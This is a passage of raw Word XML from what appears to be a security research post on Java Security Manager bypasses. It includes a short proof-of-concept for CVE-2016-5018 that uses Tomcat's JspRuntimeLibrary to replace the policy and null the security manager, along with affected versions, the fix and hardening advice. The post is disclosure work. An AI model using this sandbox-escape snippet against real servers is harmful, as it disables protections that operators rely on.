        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Creates new Bean and BeanInfo classes (eg: MyBean and MyBeanInfo) and define a property with</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.security.Policy.setPolicy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> as setter and any name (eg: payload).  If the setter takes a non-primitive, non-string argument, we will also need to provide a PropertyEditor which knows how to go from String to the expected type (in this case, a Policy object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>          public void setAsText(String text) throws IllegalArgumentException {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>              value = new MyPolicy();</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>With the example names mentioned above, the exploit looks like this:</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JspRuntimeLibrary.introspecthelper(new MyBean(), "payload", "anystr", null, null, true);</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.setSecurityManager(null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>CVE-2016-5018</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.securityfocus.com/bid/93942</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Supported affected versions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Apache Tomcat 9.0.0.M1 to 9.0.0.M9 </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Apache Tomcat 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Apache Tomcat 7.0.0 to 7.0.70</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Apache Tomcat 6.0.0 to 6.0.45</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle Glassfish Server 3.1.2 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Oracle January 2017 CPU</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle Glassfish Server 3.0.1 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Oracle January 2017 CPU</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle Glassfish Server 2.1.1 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Oracle January 2017 CPU</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fix: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Remove the gadget from the library</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conclusions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Security Manager is used for many purposes such as sandboxing plugin architectures and protecting applications against attacks. However, configuring a meaningful and secure policy for a large application is a complex task. In this post, we reviewed several ways of bypassing these policies by looking for privileged code that may be used to disable the sandbox. Bypassing is accomplished by looking for privileged gadgets, but bear in mind that there may be other ways in which user-controlled code can be granted high permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>As we demonstrated, this is not a difficult task when the policy grants </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AllPermission</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> to a large number of classes. We strongly recommend applying the principle of least privilege and grant as few permissions as possible to your code and libraries. When possible, reduce the number of classes in your application classpath by reducing the number of unnecessary dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stay Secure!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alexandr Mirosh  &amp; Alvaro Muñoz </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
